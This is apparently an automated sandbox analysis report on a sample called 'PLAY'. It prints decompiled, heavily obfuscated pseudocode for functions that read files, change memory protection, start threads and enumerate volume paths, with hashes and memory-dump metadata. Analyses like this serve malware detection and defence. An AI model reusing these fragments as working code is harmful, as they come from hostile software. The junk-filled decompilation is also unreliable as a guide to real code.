				void* _t88;

				_pop(_t72);
				_pop(_t81);
				 *((char*)(__ecx + 0x3d)) = __ebx;
				_push(_t72);
				asm("xlatb");
				_push(cs);
				_push(ss);
				E00AEDEC0(__ebx, __ecx + 1, _t72, __esi - 1);
				_t30 = ReadFile( *(_t81 - 0x1c),  *(_t81 - 0x24),  *(_t81 + 0x10), _t81 - 8, 0); // executed
				if(_t30 != 0) {
					_t45 =  *((intOrPtr*)(_t81 - 0x6e));
					_t65 = 0x1de;
					_t54 =  *((intOrPtr*)(_t81 - 0x5c));
					do {
						_t65 = _t65 + 1;
						_t54 = (_t45 & 0x000000ff) * (_t54 & 0x000000ff);
						__eflags = _t65 - 0x1e0;
					} while (_t65 < 0x1e0);
					_t73 =  *(_t81 - 0x28);
					asm("xorps xmm0, xmm0");
					_t46 =  *(_t81 - 0x1c);
					_t78 = 0x147;
					asm("movq [ebp-0x38], xmm0");
					__eflags = _t73;
					if(__eflags >= 0) {
						_t71 =  *((intOrPtr*)(_t81 - 0x20));
						if(__eflags > 0) {
							L7:
							_t49 =  *((intOrPtr*)(_t81 - 0x4c));
							_t61 =  *((intOrPtr*)(_t81 - 0x53));
							goto L8;
							do {
								do {
									L8:
									_t78 = _t78 + 1;
									_t61 = (_t49 & 0x000000ff) * (_t61 & 0x000000ff);
									__eflags = 0 - _t73;
								} while (__eflags < 0);
								if(__eflags <= 0) {
									goto L10;
								}
								break;
								L10:
								__eflags = _t78 - _t71;
							} while (_t78 < _t71);
							_t46 =  *(_t81 - 0x1c);
						} else {
							__eflags = _t71 - 0x147;
							if(_t71 > 0x147) {
								goto L7;
							}
						}
					}
					_t57 =  *((intOrPtr*)(_t81 - 0x38)) -  *(_t81 - 8);
					__eflags = _t57;
					_t32 =  *((intOrPtr*)(_t81 - 0x34));
					asm("int3");
					asm("sbb eax, 0x0");
					_push(_t32);
					_push(_t57);
					_push(1);
					_t33 = E00AEE7E0(_t32, _t46, _t46, 0, _t73, _t78); // executed
					_t85 = _t84 + 0xc;
					__eflags = _t33;
					if(_t33 != 0) {
						__eflags =  *(_t81 + 0x20);
						 *(_t81 - 0xc) = 0;
						if( *(_t81 + 0x20) == 0) {
							_t86 = _t85 - 8;
							__eflags = 0x777c - 0x3c70;
							if(0x777c <= 0x3c70) {
								_t86 = _t86 + 0x211;
							}
							_t87 = _t86 + 8;
							L24();
							 *[ds:ecx-0x2bacbc58] = 0x3c70;
							 *0x212440F3 = 0x3c70;
							 *_t87 =  *_t87 + 0x21;
							__eflags =  *_t87;
							return 0x777c;
						} else {
							_t88 = _t85 - 8;
							__eflags = 0x777c - 0x3c70;
							if(0x777c <= 0x3c70) {
								_t88 = _t88 + 0x211;
							}
							_t85 = _t88 + 8;
							L19();
							 *[ds:ecx-0x2bacbc58] = 0x3c70;
							 *((intOrPtr*)(0x212440f3)) = 0x3c70;
							 *_t85 =  *_t85 + 0x21;
							__eflags =  *_t85;
							__eflags = _t46 & 0x77a0;
						}
					} else {
						__eflags =  *(_t81 - 4) ^ _t81;
						return E00AF7B30( *(_t81 - 4) ^ _t81);
					}
				} else {
					return E00AF7B30( *(_t81 - 4) ^ _t81);
				}
			}























          0x00ae4970
          0x00ae4972
          0x00ae4973
          0x00ae497b
          0x00ae497c
          0x00ae497d
          0x00ae497e
          0x00ae4986
          0x00ae499b
          0x00ae499f
          0x00ae49b5
          0x00ae49b8
          0x00ae49bd
          0x00ae49c0
          0x00ae49c3
          0x00ae49c7
          0x00ae49ca
          0x00ae49ca
          0x00ae49d2
          0x00ae49d5
          0x00ae49d8
          0x00ae49db
          0x00ae49e0
          0x00ae49e5
          0x00ae49e7
          0x00ae49e9
          0x00ae49ec
          0x00ae49f2
          0x00ae49f2
          0x00ae49f5
          0x00ae49f5
          0x00ae49f8
          0x00ae49f8
          0x00ae49f8
          0x00ae49fb
          0x00ae49ff
          0x00ae4a04
          0x00ae4a04
          0x00ae4a08
          0x00000000
          0x00000000
          0x00000000
          0x00ae4a0a
          0x00ae4a0a
          0x00ae4a0a
          0x00ae4a0e
          0x00ae49ee
          0x00ae49ee
          0x00ae49f0
          0x00000000
          0x00000000
          0x00ae49f0
          0x00ae49ec
          0x00ae4a14
          0x00ae4a14
          0x00ae4a17
          0x00ae4a19
          0x00ae4a1a
          0x00ae4a1f
          0x00ae4a20
          0x00ae4a21
          0x00ae4a25
          0x00ae4a2a
          0x00ae4a2d
          0x00ae4a2f
          0x00ae4a47
          0x00ae4a4b
          0x00ae4a52
          0x00ae4ab8
          0x00ae4ac5
          0x00ae4ac7
          0x00ae4ac9
          0x00ae4ac9
          0x00ae4acf
          0x00ae4ad2
          0x00ae4ad7
          0x00ae4ade
          0x00ae4ae0
          0x00ae4ae0
          0x00ae4ae4
          0x00ae4a54
          0x00ae4a54
          0x00ae4a61
          0x00ae4a63
          0x00ae4a65
          0x00ae4a65
          0x00ae4a6b
          0x00ae4a6e
          0x00ae4a73
          0x00ae4a7a
          0x00ae4a7c
          0x00ae4a7c
          0x00ae4a7f
          0x00ae4a7f
          0x00ae4a31
          0x00ae4a3c
          0x00ae4a46
          0x00ae4a46
          0x00ae49a1
          0x00ae49b4
          0x00ae49b4

          APIs
          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00AE499B
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 9516e94985cbd27000d0d7f5431dbd9030ea43ef534c66c74332e3845e0db1a3
          • Instruction ID: 8fdbd41c9777cae6ca1883cadc924c6c62333664ad03e59d57d3226483806ab8
          • Opcode Fuzzy Hash: 9516e94985cbd27000d0d7f5431dbd9030ea43ef534c66c74332e3845e0db1a3
          • Instruction Fuzzy Hash: 31315931F041D84BDB05DBAADC516FEB769DF8C361F24427AE805AB381EA3548458794
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE827 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
          Download Yara Rule
          APIs
          • SetFilePointerEx.KERNELBASE ref: 00AEE854
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: 38da9ea83ca315ef728dd5d591e669fbe994ec39b1244b7746e3fdb0f6af8af5
          • Instruction ID: c53b894d86961c34fb0ef0b9a46b2704c6d49cc890e4d010940bec4f51b09bb3
          • Opcode Fuzzy Hash: 38da9ea83ca315ef728dd5d591e669fbe994ec39b1244b7746e3fdb0f6af8af5
          • Instruction Fuzzy Hash: 49118036D081C69FEB02EBFF9C011DDBB61AF57320F1898A6E9148B213D732881697D1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE910 Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AEEA43
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: d385568acdc00176d800400d4b99c6295d3b5ea9a97309d0c980fa43de64db3c
          • Instruction ID: b40e96440ee776ab8132c5ab5035b5de0ee745c0fa9ee95a48d9417e4a053282
          • Opcode Fuzzy Hash: d385568acdc00176d800400d4b99c6295d3b5ea9a97309d0c980fa43de64db3c
          • Instruction Fuzzy Hash: B3219D729081C5ABCF11DFB9DC456D9BFE1AF12310F5400ADD4889E752E77A4454CB81
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF4F26 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
          Download Yara Rule
          C-Code - Quality: 81%
          			E00AF4F26(signed int __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _t28;
				void* _t29;
				signed int _t30;
				intOrPtr _t32;
				void* _t37;
				void* _t41;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;

				_t47 = __edx;
				_t44 = __ecx;
				_pop(ss);
				 *((intOrPtr*)((__eax ^ 0x0000007c) - 0xfb)) =  *((intOrPtr*)((__eax ^ 0x0000007c) - 0xfb)) + (__eax ^ 0x0000007c) - 0xfb;
				asm("adc [eax], al"); // executed
				_t28 = E00AFA709(__ecx); // executed
				 *((intOrPtr*)(_t53 - 0x14)) = _t28;
				if(_t28 != 0) {
					_t51 = 0;
					_t48 = 0x24749020;
					 *((intOrPtr*)(_t53 - 0xc)) = 0x24749020;
					 *((intOrPtr*)(_t53 - 0x10)) = 0;
					 *((intOrPtr*)(_t53 - 8)) = 0;
					do {
						_t29 = E00B02A00(_t48, _t51, _t48, _t51);
						_t51 = _t47;
						_t48 = _t29 +  *((intOrPtr*)(_t53 - 8));
						asm("adc esi, 0x0");
						_t30 = E00B030D0( *((intOrPtr*)(_t53 - 0xc)),  *((intOrPtr*)(_t53 - 0x10)), 0x1ffff, 0);
						_t44 =  *((intOrPtr*)(_t53 - 0x14));
						 *((intOrPtr*)(_t53 - 0xc)) = _t48;
						 *((intOrPtr*)(_t53 - 0x10)) = _t51;
						 *((intOrPtr*)(_t44 + _t30 * 8)) = _t48;
						 *((intOrPtr*)(_t44 + 4 + _t30 * 8)) = _t51;
						_t32 =  *((intOrPtr*)(_t53 - 8)) + 1;
						 *((intOrPtr*)(_t53 - 8)) = _t32;
					} while (_t32 < 0x35a4eb35);
					E00AFA6EE(_t44); // executed
				} else {
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x18], xmm0");
					_t51 =  *((intOrPtr*)(_t53 - 0x14));
					_t48 =  *((intOrPtr*)(_t53 - 0x18));
				}
				 *0xb0d720 = _t48;
				 *0xb0d724 = _t51; // executed
				E00AEC750(0x68, _t44, _t48, _t51); // executed
				E00AE1460(0x68, _t48, _t51); // executed
				E00AEC750(0x68, _t44, _t48, _t51);
				_t45 =  *(_t53 - 1) & 0x000000ff;
				if(_t45 > 0x74 && _t45 - 0x74 >= 2) {
					_t41 = (_t45 - 0x76 >> 1) + 1;
					do {
						 *(_t53 - 0x3e) =  *(_t53 - 0x3e) * 0xe400;
						_t41 = _t41 - 1;
					} while (_t41 != 0);
				}
				_t37 = E00AF4590(0x68, _t48, _t51); // executed
				if(_t37 == 0) {
					_t37 = E00AF4390(_t48, _t51); // executed
				}
				return _t37;
			}














          0x00af4f26
          0x00af4f26
          0x00af4f27
          0x00af4f2e
          0x00af4f30
          0x00af4f32
          0x00af4f3a
          0x00af4f3f
          0x00af4f51
          0x00af4f53
          0x00af4f58
          0x00af4f5b
          0x00af4f5e
          0x00af4f61
          0x00af4f65
          0x00af4f76
          0x00af4f78
          0x00af4f7e
          0x00af4f81
          0x00af4f86
          0x00af4f89
          0x00af4f8c
          0x00af4f8f
          0x00af4f92
          0x00af4f99
          0x00af4f9a
          0x00af4f9d
          0x00af4fa5
          0x00af4f41
          0x00af4f41
          0x00af4f44
          0x00af4f49
          0x00af4f4c
          0x00af4f4c
          0x00af4fad
          0x00af4fb3
          0x00af4fb9
          0x00af4fbe
          0x00af4fc3
          0x00af4fc8
          0x00af4fcf
          0x00af4fde
          0x00af4fe0
          0x00af4fe7
          0x00af4feb
          0x00af4feb
          0x00af4fe0
          0x00af4ff0
          0x00af4ff7
          0x00af4ff9
          0x00af4ff9
          0x00af5006

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: __aullrem
          • String ID:
          • API String ID: 3758378126-0
          • Opcode ID: 029accf625574264b1b82ee92a8b42c097002a687b9a40b022ef76ce94cf5184
          • Instruction ID: 53265064d0b2e1b3faeb6492f8943b2f9d93bd73dcd212d3f81e571466b318a6
          • Opcode Fuzzy Hash: 029accf625574264b1b82ee92a8b42c097002a687b9a40b022ef76ce94cf5184
          • Instruction Fuzzy Hash: FF21E0B1C0125D9BCF10EBE5DA456BEBFB5EF99720F20019AF504A7200D7719A02CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE4E55 Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00AE4E55(void* __eax, char __ebx, void* __ecx, void* __esi) {
				intOrPtr _t25;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				int _t37;
				void* _t41;
				void* _t42;
				signed int _t44;
				void** _t46;
				void* _t47;
				void* _t50;
				void* _t52;

				_pop(_t36);
				_pop(_t44);
				 *((char*)(__ecx + 0x3d)) = __ebx;
				_push(_t36);
				asm("xlatb");
				_push(cs);
				_push(ss);
				E00AEDEC0(__ebx, __ecx + 1, _t36, __esi - 1);
				_t41 =  *(_t44 - 0x1c);
				_t18 = ReadFile( *(_t44 - 0x20), _t41, 0x428, _t44 - 0xc, 0); // executed
				_t25 =  *((intOrPtr*)(_t44 - 0x10));
				_t37 = _t18;
				_t31 = 0x4b;
				goto L1;
				_t35 =  *((intOrPtr*)(_t44 - 0x18));
				if(_t50 > 0) {
					L5:
					_t31 = _t31 + 1;
					 *(_t44 - 0x30) =  *(_t44 - 0x30) * 0x1059;
					_t18 = 0;
					_t52 = 0 - _t25;
				} else {
					if(_t35 > _t31) {
						do {
							goto L5;
						} while (_t52 < 0 || _t52 <= 0 && _t31 < _t35);
					}
				}
				if(_t37 != 0) {
					 *((intOrPtr*)(_t44 - 0x10)) =  *((intOrPtr*)(_t41 + 0x1c));
					_t47 = _t46 - 0x10;
					_t31 = 0x1d9f;
					__eflags = 0x1d9f - 0x1028;
					if(0x1d9f <= 0x1028) {
						_t47 = _t47 + 0x116;
					}
					_t46 = _t47 + 0x10;
					L16();
					_t42 = _t41 -  *((intOrPtr*)(_t41 - 0x7a37e34));
					__eflags = _t42;
					do {
						asm("clc");
						asm("sbb [eax], esp");
						_t25 = 0x7e;
					} while (__eflags != 0);
					_t18 = 0x7a;
					asm("out dx, eax");
					asm("invalid");
					asm("wait");
					asm("sti");
					_t41 = _t42 - 1;
					__eflags = _t41;
					if (_t41 <= 0) goto L1;
					 *_t46 =  *_t46 + 0x49;
					__eflags =  *_t46;
				} else {
					return E00AF7B30( *(_t44 - 8) ^ _t44);
				}
			}















          0x00ae4e56
          0x00ae4e58
          0x00ae4e59
          0x00ae4e61
          0x00ae4e62
          0x00ae4e63
          0x00ae4e64
          0x00ae4e6c
          0x00ae4e71
          0x00ae4e83
          0x00ae4e85
          0x00ae4e88
          0x00ae4e8a
          0x00ae4e8a
          0x00ae4e93
          0x00ae4e96
          0x00ae4ea0
          0x00ae4ea7
          0x00ae4ea8
          0x00ae4eac
          0x00ae4eae
          0x00ae4e98
          0x00ae4e9a
          0x00ae4ea0
          0x00000000
          0x00000000
          0x00ae4ea0
          0x00ae4e9a
          0x00ae4eba
          0x00ae4ed3
          0x00ae4ed6
          0x00ae4ed9
          0x00ae4ede
          0x00ae4ee4
          0x00ae4ee6
          0x00ae4ee6
          0x00ae4eec
          0x00ae4eef
          0x00ae4ef6
          0x00ae4ef6
          0x00ae4efb
          0x00ae4efb
          0x00ae4efc
          0x00ae4efe
          0x00ae4efe
          0x00ae4f02
          0x00ae4f04
          0x00ae4f05
          0x00ae4f07
          0x00ae4f08
          0x00ae4f09
          0x00ae4f09
          0x00ae4f0a
          0x00ae4f0b
          0x00ae4f0b
          0x00ae4ebc
          0x00ae4ecf
          0x00ae4ecf

          APIs
          • ReadFile.KERNELBASE(?,?,00000428,?,00000000), ref: 00AE4E83
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: b6d43bcd0cad437c2d75ebb77914816a64f7d2bc6aacd7b0e0271b61624e3f6d
          • Instruction ID: 916d019e6d31b42ac79a9e3532597d1a9f9f43492bf01e12e3cc51b4e4e54d4e
          • Opcode Fuzzy Hash: b6d43bcd0cad437c2d75ebb77914816a64f7d2bc6aacd7b0e0271b61624e3f6d
          • Instruction Fuzzy Hash: F9117D36E102884FEF14DBBAEC826FEB7BAFF58310F55056DE91597380EA7058054791
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE4CC Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
          Download Yara Rule
          C-Code - Quality: 52%
          			E00AEE4CC(void* __eax, void* __ebx, signed int __edi, void* __esi) {
				void* _t29;
				void* _t31;
				signed char _t33;
				void* _t51;

				_t44 = __edi;
				_t31 = __ebx - 1;
				asm("int3");
				asm("daa");
				_t36 = __eax;
				if(_t31 >= 0) {
					 *0x2f60108c =  *0x2f60108c + 0x2f60108c;
					 *((intOrPtr*)(_t31 + 0x39e80cc4)) =  *((intOrPtr*)(_t31 + 0x39e80cc4)) + 0x2f60108c;
					L7();
					 *((intOrPtr*)(__edi + __edi * 2 - 0x5a)) =  *((intOrPtr*)(__edi + __edi * 2 - 0x5a)) - __eax;
				} else {
					_t49 = __esi + 1;
					asm("cmpsd");
					_pop(_t33);
					 *(__edi + _t49 - 0x1a7a3f52) =  *(__edi + __esi + 1 - 0x1a7a3f52) & _t33;
					asm("aaa");
					asm("scasb");
					asm("rol byte [ebp-0x3f51e81b], 0xac");
					asm("in eax, 0x8b");
					E00AEDEC0(_t33, _t36, _t44, _t49);
					_t29 = CreateThread(0, 0,  *(_t51 + 8),  *(_t51 + 0xc), 0, 0); // executed
					return _t29;
				}
			}







          0x00aee4cc
          0x00aee4d1
          0x00aee4d2
          0x00aee4d3
          0x00aee4d4
          0x00aee4d5
          0x00aee528
          0x00aee52a
          0x00aee52e
          0x00aee533
          0x00aee4d7
          0x00aee4d7
          0x00aee4d8
          0x00aee4d9
          0x00aee4db
          0x00aee4dd
          0x00aee4de
          0x00aee4df
          0x00aee4ed
          0x00aee4f4
          0x00aee507
          0x00aee50e
          0x00aee50e

          APIs
          • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 00AEE507
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CreateThread
          • String ID:
          • API String ID: 2422867632-0
          • Opcode ID: bbf96d9eee433b7cd359270e1fea265bcaa60bc64e571ca0ee0749a392495938
          • Instruction ID: 7010ee408c5fb3ad1539002e918e188e0f038ebbfdde810e19065236321127ba
          • Opcode Fuzzy Hash: bbf96d9eee433b7cd359270e1fea265bcaa60bc64e571ca0ee0749a392495938
          • Instruction Fuzzy Hash: FE11883618CAC19BE3221FE4E8023817F70F74A721F54469AD6D89E0D3C726650AC7A2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEA5C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
          Download Yara Rule
          C-Code - Quality: 23%
          			E00AEA5C2(void* __eax, intOrPtr __ebx, signed int __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr* _t31;
				void* _t32;
				void* _t36;
				void* _t37;
				void* _t44;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr* _t62;
				void* _t71;

				_t55 = __edi;
				_t53 = __edx;
				asm("sbb esp, [edi+0x6b102c9e]");
				_t1 = __eax + __ecx * 4 - 0x129dd33a;
				 *_t1 = __ebx;
				_pop(_t57);
				_t44 =  *_t1 - 1;
				asm("repe xchg edx, eax");
				_t31 = E00AEDEC0(_t44, __ecx, __edi, _t57);
				_t32 =  *_t31(_t59 - 0x210, _t59 - 0x620, 0x208, _t59 - 0x624); // executed
				if(_t32 == 0) {
					 *((char*)(_t59 - 0x626)) =  *((intOrPtr*)(_t59 - 0x640)) + 1 +  *((intOrPtr*)(_t59 - 0x630));
				}
				 *((intOrPtr*)(_t59 - 0x640)) = ( *(_t59 - 0x68e) & 0x0000ffff) + ( *(_t59 - 0x690) & 0x0000ffff);
				if( *((intOrPtr*)(_t59 - 0x624)) <= 1) {
					_t37 = E00AEA150(_t44, _t59 - 0x210, _t55, _t57); // executed
					if(_t53 != 0 || _t37 > 0x40000000) {
						E00AEA850(_t44, _t59 - 0x210, _t53, _t55, _t57); // executed
						 *((intOrPtr*)(_t59 - 0x630)) = 0;
					}
					 *((char*)(_t59 - 0x625)) =  *((char*)(_t59 - 0x625)) + 3;
					 *((short*)(_t59 - 0x634)) =  *((short*)(_t59 - 0x634)) + 3;
				}
				 *((intOrPtr*)(_t59 - 0x626)) =  *((intOrPtr*)(_t59 - 0x626)) +  *((intOrPtr*)(_t59 - 0x6d0)) - 1;
				_t61 = _t60 - 0xc;
				_t36 = 0x3d6f;
				_t71 = 0x3d6f - 0x4af1;
				if(0x3d6f == 0x4af1) {
					_t61 = _t61 + 0x14a;
				}
				_t62 = _t61 + 0xc;
				L16();
				asm("in al, 0xbc");
				if(_t71 > 0) {
					asm("fcmovnu st0, st3");
				}
				asm("hlt");
				if(_t44 >=  *[ss:edi+edx*2-0x6402e548]) {
					_push(_t62);
					asm("ror byte [eax], 1");
					_t36 = _t57;
					asm("invalid");
					asm("sbb eax, 0x6424123f");
				}
				 *[fs:esp] =  *[fs:esp] + 0x48;
				 *_t62 =  *_t62 + 0x48;
				return _t36;
			}
















          0x00aea5c2
          0x00aea5c2
          0x00aea5c2
          0x00aea5c8
          0x00aea5c8
          0x00aea5cf
          0x00aea5d0
          0x00aea5d3
          0x00aea5dc
          0x00aea5fb
          0x00aea5ff
          0x00aea60f
          0x00aea60f
          0x00aea62c
          0x00aea632
          0x00aea63a
          0x00aea641
          0x00aea650
          0x00aea655
          0x00aea655
          0x00aea65f
          0x00aea666
          0x00aea666
          0x00aea676
          0x00aea67c
          0x00aea67f
          0x00aea683
          0x00aea687
          0x00aea689
          0x00aea689
          0x00aea68f
          0x00aea692
          0x00aea697
          0x00aea699
          0x00aea69b
          0x00aea69d
          0x00aea6a8
          0x00aea6a9
          0x00aea6ab
          0x00aea6ac
          0x00aea6af
          0x00aea6b0
          0x00aea6b1
          0x00aea6b1
          0x00aea6b5
          0x00aea6b6
          0x00aea6ba

          APIs
          • GetVolumePathNamesForVolumeNameW.KERNELBASE(?,?,00000208,?), ref: 00AEA5FB
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Volume$NameNamesPath
          • String ID:
          • API String ID: 1552044656-0
          • Opcode ID: eaa43f8995a3efe5fea70b6d1da532be18e048396fad4643f0714339fa14f9d5
          • Instruction ID: 0c97e2e580d4cc93d57623451157e04f2d41d40cea7b9c69c44ed4a8ff966e21
          • Opcode Fuzzy Hash: eaa43f8995a3efe5fea70b6d1da532be18e048396fad4643f0714339fa14f9d5
          • Instruction Fuzzy Hash: B0213570C045B84ADB35AF208C557E8BB32AFB1304F0805DDD41966142EB326FA5CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFD42C Relevance: 1.6, APIs: 1, Instructions: 52COMMON
          Download Yara Rule
          C-Code - Quality: 91%
          			E00AFD42C(void* __edi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t17;
				void* _t18;
				void* _t27;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_push(_t27);
				_t17 = E00AFC42C(_t27, 0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00AFE2DC(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00AFC2CE(0);
				return _t35;
			}











          0x00afd431
          0x00afd432
          0x00afd439
          0x00afd43e
          0x00afd442
          0x00afd449
          0x00afd44f
          0x00afd44f
          0x00afd455
          0x00afd457
          0x00afd45a
          0x00afd45a
          0x00afd45d
          0x00afd45f
          0x00afd465
          0x00afd469
          0x00afd46e
          0x00afd472
          0x00afd474
          0x00afd477
          0x00afd47d
          0x00afd484
          0x00afd488
          0x00afd48c
          0x00afd48f
          0x00afd492
          0x00afd492
          0x00afd496
          0x00afd499
          0x00afd44b
          0x00afd44b
          0x00afd44b
          0x00afd49b
          0x00afd4a6

          APIs
            • Part of subcall function 00AFC42C: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFC0D5,00000001,00000364,00000002,000000FF,?,00000087,00AFA4F1,00AFC2F4,?,?,00AFB5D2), ref: 00AFC46D
          • _free.LIBCMT ref: 00AFD49B
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
